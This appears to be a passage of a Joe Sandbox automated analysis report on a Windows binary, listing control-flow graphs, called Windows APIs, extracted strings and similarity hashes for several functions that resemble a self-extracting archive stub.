d6b925 520->549 550 d7bf5a-d7bf69 call d835b3 520->550 523->495 532 d7bfe8-d7bfeb 523->532 525->497 526->525 536 d7bfef-d7c01b call d6400a GetFileAttributesW 532->536 533->488 547 d7bfed-d7bfee 536->547 548 d7c01d-d7c033 MoveFileW 536->548 540->427 544 d7c327-d7c33b SendMessageW 540->544 544->427 547->536 548->495 551 d7c035-d7c03f MoveFileExW 548->551 549->512 556 d7bf7f-d7bfbe call d835b3 call d7f350 549->556 550->549 550->556 551->495 556->519
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D7BDFA
                                  • Part of subcall function 00D7AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D7AAFE
                                • SetWindowTextW.USER32(?,?), ref: 00D7C127
                                • _wcsrchr.LIBVCRUNTIME ref: 00D7C2B1
                                • GetDlgItem.USER32(?,00000066), ref: 00D7C2EC
                                • SetWindowTextW.USER32(00000000,?), ref: 00D7C2FC
                                • SendMessageW.USER32(00000000,00000143,00000000,00DAA472), ref: 00D7C30A
                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D7C335
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                • API String ID: 3564274579-312220925
                                • Opcode ID: 40857879e18f360ede30e6d781a7af194669d6d13ec3c117d3df526f59addd4a
                                • Instruction ID: d52dd1e32aee301892ae5d0de0771bcca8428c226819231c9676bed654bc8699
                                • Opcode Fuzzy Hash: 40857879e18f360ede30e6d781a7af194669d6d13ec3c117d3df526f59addd4a
                                • Instruction Fuzzy Hash: C5E14E72D00619AEDB25EBA4DC45EEE777CEF08711F1481AAF909E2151FB709A848B70
                                Function 00D6D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 561 d6d341-d6d378 call d7e28c call d7e360 call d815e8 568 d6d37a-d6d3a9 GetModuleFileNameW call d6bc85 call d6fe2e 561->568 569 d6d3ab-d6d3b4 call d6fe56 561->569 573 d6d3b9-d6d3dd call d69619 call d699b0 568->573 569->573 580 d6d3e3-d6d3eb 573->580 581 d6d7a0-d6d7a6 call d69653 573->581 583 d6d3ed-d6d405 call d73781 * 2 580->583 584 d6d409-d6d438 call d85a90 * 2 580->584 587 d6d7ab-d6d7bb 581->587 594 d6d407 583->594 595 d6d43b-d6d43e 584->595 594->584 596 d6d444-d6d44a call d69e40 595->596 597 d6d56c-d6d58f call d69d30 call d835d3 595->597 601 d6d44f-d6d476 call d69bf0 596->601 597->581 608 d6d595-d6d5b0 call d69bf0 597->608 606 d6d535-d6d538 601->606 607 d6d47c-d6d484 601->607 612 d6d53b-d6d55d call d69d30 606->612 610 d6d486-d6d48e 607->610 611 d6d4af-d6d4ba 607->611 618 d6d5b2-d6d5b7 608->618 619 d6d5b9-d6d5cc call d835d3 608->619 610->611 614 d6d490-d6d4aa call d85ec0 610->614 615 d6d4e5-d6d4ed 611->615 616 d6d4bc-d6d4c8 611->616 612->595 630 d6d563-d6d566 612->630 633 d6d4ac 614->633 634 d6d52b-d6d533 614->634 623 d6d4ef-d6d4f7 615->623 624 d6d519-d6d51d 615->624 616->615 621 d6d4ca-d6d4cf 616->621 626 d6d5f1-d6d5f8 618->626 619->581 640 d6d5d2-d6d5ee call d7137a call d835ce 619->640 621->615 629 d6d4d1-d6d4e3 call d85808 621->629 623->624 631 d6d4f9-d6d513 call d85ec0 623->631 624->606 625 d6d51f-d6d522 624->625 625->607 636 d6d5fc-d6d625 call d6fdfb call d835d3 626->636 637 d6d5fa 626->637 629->615 644 d6d527 629->644 630->581 630->597 631->581 631->624 633->611 634->612 650 d6d627-d6d62e call d835ce 636->650 651 d6d633-d6d649 636->651 637->636 640->626 644->634 650->581 654 d6d731-d6d757 call d6ce72 call d835ce * 2 651->654 655 d6d64f-d6d65d 651->655 689 d6d771-d6d79d call d85a90 * 2 654->689 690 d6d759-d6d76f call d73781 * 2 654->690 657 d6d664-d6d669 655->657 659 d6d66f-d6d678 657->659 660 d6d97c-d6d984 657->660 662 d6d684-d6d68b 659->662 663 d6d67a-d6d67e 659->663 664 d6d98a-d6d98e 660->664 665 d6d72b-d6d72e 660->665 667 d6d880-d6d891 call d6fcbf 662->667 668 d6d691-d6d6b6 662->668 663->660 663->662 669 d6d990-d6d996 664->669 670 d6d9de-d6d9e4 664->670 665->654 691 d6d976-d6d979 667->691 692 d6d897-d6d8c0 call d6fe56 call d85885 667->692 676 d6d6b9-d6d6de call d835b3 call d85808 668->676 677 d6d722-d6d725 669->677 678 d6d99c-d6d9a3 669->678 674 d6d9e6-d6d9ec 670->674 675 d6da0a-d6da2a call d6ce72 670->675 674->675 681 d6d9ee-d6d9f4 674->681 696 d6da02-d6da05 675->696 709 d6d6f6 676->709 710 d6d6e0-d6d6ea 676->710 677->657 677->665 684 d6d9a5-d6d9a8 678->684 685 d6d9ca 678->685 681->677 694 d6d9fa-d6da01 681->694 687 d6d9c6-d6d9c8 684->687 688 d6d9aa-d6d9ad 684->688 693 d6d9cc-d6d9d9 685->693 687->693 697 d6d9c2-d6d9c4 688->697 698 d6d9af-d6d9b2 688->698 689->581 690->689 691->660 692->691 721 d6d8c6-d6d93c call d71596 call d6fdfb call d6fdd4 call d6fdfb call d858d9 692->721 693->677 694->696 697->693 704 d6d9b4-d6d9b8 698->704 705 d6d9be-d6d9c0 698->705 704->681 711 d6d9ba-d6d9bc 704->711 705->693 716 d6d6f9-d6d6fd 709->716 710->709 715 d6d6ec-d6d6f4 710->715 711->693 715->716 716->676 720 d6d6ff-d6d706 716->720 722 d6d7be-d6d7c1 720->722 723 d6d70c-d6d71a call d6fdfb 720->723 754 d6d93e-d6d947 721->754 755 d6d94a-d6d95f 721->755 722->667 725 d6d7c7-d6d7ce 722->725 730 d6d71f 723->730 728 d6d7d6-d6d7d7 725->728 729 d6d7d0-d6d7d4 725->729 728->725 729->728 732 d6d7d9-d6d7e7 729->732 730->677 734 d6d808-d6d830 call d71596 732->734 735 d6d7e9-d6d7ec 732->735 744 d6d832-d6d84e call d835e9 734->744 745 d6d853-d6d85b 734->745 738 d6d805 735->738 739 d6d7ee-d6d803 735->739 738->734 739->735 739->738 744->730 748 d6d862-d6d87b call d6dd6b 745->748 749 d6d85d 745->749 748->730 749->748 754->755 756 d6d960-d6d967 755->756 757 d6d973-d6d974 756->757 758 d6d969-d6d96d 756->758 757->756 758->730 758->757
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D6D346
                                • _wcschr.LIBVCRUNTIME ref: 00D6D367
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00D6D328,?), ref: 00D6D382
                                • __fprintf_l.LIBCMT ref: 00D6D873
                                  • Part of subcall function 00D7137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D6B652,00000000,?,?,?,0001042C), ref: 00D71396
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                • API String ID: 4184910265-980926923
                                • Opcode ID: 70151af9d4c8a5caf6892876ef242fda5023aec5af815e069b6ac16af000ae9f
                                • Instruction ID: c8987b523e37a1ebfdb5b91b8e2a57bd35fff0eb79e5042dd048b9cba4aff1e6
                                • Opcode Fuzzy Hash: 70151af9d4c8a5caf6892876ef242fda5023aec5af815e069b6ac16af000ae9f
                                • Instruction Fuzzy Hash: 7112A271E002199FDF24EFA4EC81BEEB7B6EF04704F14456AE546A7291EB709A44CB70
                                Function 00D7CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00D7AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                                  • Part of subcall function 00D7AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                                  • Part of subcall function 00D7AC74: IsDialogMessageW.USER32(0001042C,?), ref: 00D7ACAA
                                  • Part of subcall function 00D7AC74: TranslateMessage.USER32(?), ref: 00D7ACB8
                                  • Part of subcall function 00D7AC74: DispatchMessageW.USER32(?), ref: 00D7ACC2
                                • GetDlgItem.USER32(00000068,00DBECB0), ref: 00D7CB6E
                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00D7A632,00000001,?,?,00D7AECB,00D94F88,00DBECB0), ref: 00D7CB96
                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D7CBA1
                                • SendMessageW.USER32(00000000,000000C2,00000000,00D935B4), ref: 00D7CBAF
                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D7CBC5
                                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D7CBDF
                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D7CC23
                                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D7CC31
                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D7CC40
                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D7CC67
                                • SendMessageW.USER32(00000000,000000C2,00000000,00D9431C), ref: 00D7CC76
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                • String ID: \
                                • API String ID: 3569833718-2967466578
                                • Opcode ID: 23dbde3b440688cc713525f56f0fcf9a32981865d3ac0438f3c077c76f4034ff
                                • Instruction ID: 1fef7ec4b9dfd8f607a8d9572e6a2a52af32468bf3dd1ec46a3f92a2a4d13273
                                • Opcode Fuzzy Hash: 23dbde3b440688cc713525f56f0fcf9a32981865d3ac0438f3c077c76f4034ff
                                • Instruction Fuzzy Hash: FB31D171185343AFE301DF20DC8AFAB7FACEB86744F000519FA51D6291EB644908EBB6
                                Function 00D7CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 796 d7ce22-d7ce3a call d7e360 799 d7ce40-d7ce4c call d835b3 796->799 800 d7d08b-d7d093 796->800 799->800 803 d7ce52-d7ce7a call d7f350 799->803 806 d7ce84-d7ce91 803->806 807 d7ce7c 803->807 808 d7ce95-d7ce9e 806->808 809 d7ce93 806->809 807->806 810 d7ced6 808->810 811 d7cea0-d7cea2 808->811 809->808 813 d7ceda-d7cedd 810->813 812 d7ceaa-d7cead 811->812 814 d7ceb3-d7cebb 812->814 815 d7d03c-d7d041 812->815 816 d7cee4-d7cee6 813->816 817 d7cedf-d7cee2 813->817 818 d7d055-d7d05d 814->818 819 d7cec1-d7cec7 814->819 820 d7d036-d7d03a 815->820 821 d7d043 815->821 822 d7cef9-d7cf0e call d6b493 816->822 823 d7cee8-d7ceef 816->823 817->816 817->822 824 d7d065-d7d06d 818->824 825 d7d05f-d7d061 818->825 819->818 828 d7cecd-d7ced4 819->828 820->815 829 d7d048-d7d04c 820->829 821->829 831 d7cf27-d7cf32 call d6a180 822->831 832 d7cf10-d7cf1d call d717ac 822->832 823->822 826 d7cef1 823->826 824->813 825->824 826->822 828->810 828->812 829->818 838 d7cf34-d7cf4b call d6b239 831->838 839 d7cf4f-d7cf5c ShellExecuteExW 831->839 832->831 837 d7cf1f 832->837 837->831 838->839 841 d7cf62-d7cf6f 839->841 842 d7d08a 839->842 843 d7cf82-d7cf84 841->843 844 d7cf71-d7cf78 841->844 842->800 847 d7cf86-d7cf8f 843->847 848 d7cf9b-d7cfba call d7d2e6 843->848 844->843 846 d7cf7a-d7cf80 844->846 846->843 849 d7cff1-d7cffd CloseHandle 846->849 847->848 857 d7cf91-d7cf99 ShowWindow 847->857 848->849 866 d7cfbc-d7cfc4 848->866 850 d7cfff-d7d00c call d717ac 849->850 851 d7d00e-d7d01c 849->851 850->851 863 d7d072 850->863 855 d7d01e-d7d020 851->855 856 d7d079-d7d07b 851->856 855->856 861 d7d022-d7d028 855->861 856->842 860 d7d07d-d7d07f 856->860 857->848 860->842 864 d7d081-d7d084 ShowWindow 860->864 861->856 865 d7d02a-d7d034 861->865 863->856 864->842 865->856 866->849 867 d7cfc6-d7cfd7 GetExitCodeProcess 866->867 867->849 868 d7cfd9-d7cfe3 867->868 869 d7cfe5 868->869 870 d7cfea 868->870 869->870 870->849
                                APIs
                                • ShellExecuteExW.SHELL32(?), ref: 00D7CF54
                                • ShowWindow.USER32(?,00000000), ref: 00D7CF93
                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00D7CFCF
                                • CloseHandle.KERNEL32(?), ref: 00D7CFF5
                                • ShowWindow.USER32(?,00000001), ref: 00D7D084
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                • String ID: $.exe$.inf
                                • API String ID: 3686203788-2452507128
                                • Opcode ID: 4c6c61f791929807e1170daa68b5196682400ec959ac2709040a19bf0e8ef35a
                                • Instruction ID: d72e5775f36f80f8e8232802998d86b231efa947896cb1e0aef1ebd638ced57e
                                • Opcode Fuzzy Hash: 4c6c61f791929807e1170daa68b5196682400ec959ac2709040a19bf0e8ef35a
                                • Instruction Fuzzy Hash: 9D61CF70414381DEDB319F249800AABBBF6EF85304F08A91EF5C997255F7B18989CB72
                                Function 00D8A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 871 d8a058-d8a071 872 d8a073-d8a083 call d8e6ed 871->872 873 d8a087-d8a08c 871->873 872->873 883 d8a085 872->883 875 d8a099-d8a0bd MultiByteToWideChar 873->875 876 d8a08e-d8a096 873->876 878 d8a250-d8a263 call d7ec4a 875->878 879 d8a0c3-d8a0cf 875->879 876->875 880 d8a0d1-d8a0e2 879->880 881 d8a123 879->881 884 d8a101-d8a112 call d88518 880->884 885 d8a0e4-d8a0f3 call d91a30 880->885 887 d8a125-d8a127 881->887 883->873 891 d8a245 884->891 897 d8a118 884->897 885->891 896 d8a0f9-d8a0ff 885->896 890 d8a12d-d8a140 MultiByteToWideChar 887->890 887->891 890->891 894 d8a146-d8a158 call d8a72c 890->894 895 d8a247-d8a24e call d8a2c0 891->895 902 d8a15d-d8a161 894->902 895->878 901 d8a11e-d8a121 896->901 897->901 901->887 902->891 903 d8a167-d8a16e 902->903 904 d8a1a8-d8a1b4 903->904 905 d8a170-d8a175 903->905 907 d8a200 904->907 908 d8a1b6-d8a1c7 904->908 905->895 906 d8a17b-d8a17d 905->906 906->891 909 d8a183-d8a19d call d8a72c 906->909 910 d8a202-d8a204 907->910 911 d8a1c9-d8a1d8 call d91a30 908->911 912 d8a1e2-d8a1f3 call d88518 908->912 909->895 924 d8a1a3 909->924 914 d8a23e-d8a244 call d8a2c0 910->914 915 d8a206-d8a21f call d8a72c 910->915 911->914 927 d8a1da-d8a1e0 911->927 912->914 923 d8a1f5 912->923 914->891 915->914 929 d8a221-d8a228 915->929 928 d8a1fb-d8a1fe 923->928 924->891 927->928 928->910 930 d8a22a-d8a22b 929->930 931 d8a264-d8a26a 929->931 932 d8a22c-d8a23c WideCharToMultiByte 930->932 931->932 932->914 933 d8a26c-d8a273 call d8a2c0 932->933 933->895
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D84E35,00D84E35,?,?,?,00D8A2A9,00000001,00000001,3FE85006), ref: 00D8A0B2
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D8A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00D8A138
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D8A232
                                • __freea.LIBCMT ref: 00D8A23F
                                  • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                • __freea.LIBCMT ref: 00D8A248
                                • __freea.LIBCMT ref: 00D8A26D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                • String ID:
                                • API String ID: 1414292761-0
                                • Opcode ID: 28d6b5fd73ac8426761f25cbb000f5c9aaa9c3083a195c6c62bb00f4043eba3e
                                • Instruction ID: a8663e88b0079f40a373188902437d37d2464dd320d4279437ae141679cb3752
                                • Opcode Fuzzy Hash: 28d6b5fd73ac8426761f25cbb000f5c9aaa9c3083a195c6c62bb00f4043eba3e
                                • Instruction Fuzzy Hash: A551DE72600216AFFB35AE68CC41FBB77A9EB41760F19422AFC04D6140EB35DC4087B6
                                Function 00D7A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                                  • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                                • OleInitialize.OLE32(00000000), ref: 00D7A34E
                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D7A385
                                • SHGetMalloc.SHELL32(00DA8430), ref: 00D7A38F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                • String ID: riched20.dll$3To
                                • API String ID: 3498096277-2168385784
                                • Opcode ID: f4d63a59d54eac95918c38e36d8225a8a6f8eeec3b4880c760fc4aa2b2026390
                                • Instruction ID: 0167060ecd46d655e43e76fd934871d0ad838b29c15c505dff419613055ce05e
                                • Opcode Fuzzy Hash: f4d63a59d54eac95918c38e36d8225a8a6f8eeec3b4880c760fc4aa2b2026390
                                • Instruction Fuzzy Hash: 7EF0E7B1D0020AABCB10AF99D8499EFFBFCEB95711F00415AE814E2241DBB456098BB1
                                Function 00D699B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 940 d699b0-d699d1 call d7e360 943 d699d3-d699d6 940->943 944 d699dc 940->944 943->944 946 d699d8-d699da 943->946 945 d699de-d699fb 944->945 947 d69a03-d69a0d 945->947 948 d699fd 945->948 946->945 949 d69a12-d69a31 call d670bf 947->949 950 d69a0f 947->950 948->947 953 d69a33 949->953 954 d69a39-d69a57 CreateFileW 949->954 950->949 953->954 955 d69abb-d69ac0 954->955 956 d69a59-d69a7b GetLastError call d6b66c 954->956 957 d69ac2-d69ac5 955->957 958 d69ae1-d69af5 955->958 965 d69a7d-d69a9f CreateFileW GetLastError 956->965 966 d69aaa-d69aaf 956->966 957->958 960 d69ac7-d69adb SetFileTime 957->960 961 d69af7-d69b0f call d6fe56 958->961 962 d69b13-d69b1e 958->962 960->958 961->962 969 d69aa5-d69aa8 965->969 970 d69aa1 965->970 966->955 967 d69ab1 966->967 967->955 969->955 969->966 970->969
                                APIs
                                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00D678AD,?,00000005,?,00000011), ref: 00D69A4C
                                • GetLastError.KERNEL32(?,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69A59
                                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00D678AD,?,00000005,?), ref: 00D69A8E
                                • GetLastError.KERNEL32(?,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69A96
                                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69ADB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$CreateErrorLast$Time
                                • String ID:
                                • API String ID: 1999340476-0
                                • Opcode ID: 140011471d6d4a92dcabe58b5259a879bfbb98bd4ca31fbfc3d3b55eb1dc86ec
                                • Instruction ID: df45e0bcd9f7e63d8a1ad8fda4406a9905c334c66de7dbba18f551ffdc7cd03e
                                • Opcode Fuzzy Hash: 140011471d6d4a92dcabe58b5259a879bfbb98bd4ca31fbfc3d3b55eb1dc86ec
                                • Instruction Fuzzy Hash: D54122705447466FE7208F60CC45BDAFBD8AB05324F14071AF9E8962D1E7B5A988CBB1
                                Function 00D7AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 999 d7ac74-d7ac8d PeekMessageW 1000 d7ac8f-d7aca3 GetMessageW 999->1000 1001 d7acc8-d7accc 999->1001 1002 d7aca5-d7acb2 IsDialogMessageW 1000->1002 1003 d7acb4-d7acc2 TranslateMessage DispatchMessageW 1000->1003 1002->1001 1002->1003 1003->1001
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                                • IsDialogMessageW.USER32(0001042C,?), ref: 00D7ACAA
                                • TranslateMessage.USER32(?), ref: 00D7ACB8
                                • DispatchMessageW.USER32(?), ref: 00D7ACC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Message$DialogDispatchPeekTranslate
                                • String ID:
                                • API String ID: 1266772231-0
                                • Opcode ID: 7dcb53d5de2b028c2ffd02b3ac6fc86e3fea2b1dd26c90df73b06d788333bd8e
                                • Instruction ID: 84aad7bb71731be651974bad1cd7dc3e2882380b60158fe5ea5572e3d443fbe6
                                • Opcode Fuzzy Hash: 7dcb53d5de2b028c2ffd02b3ac6fc86e3fea2b1dd26c90df73b06d788333bd8e
                                • Instruction Fuzzy Hash: F7F0BD7190132BAB8B209BE59C4CDEF7F6CEE453917448416F919D2210EA34D505D7B1
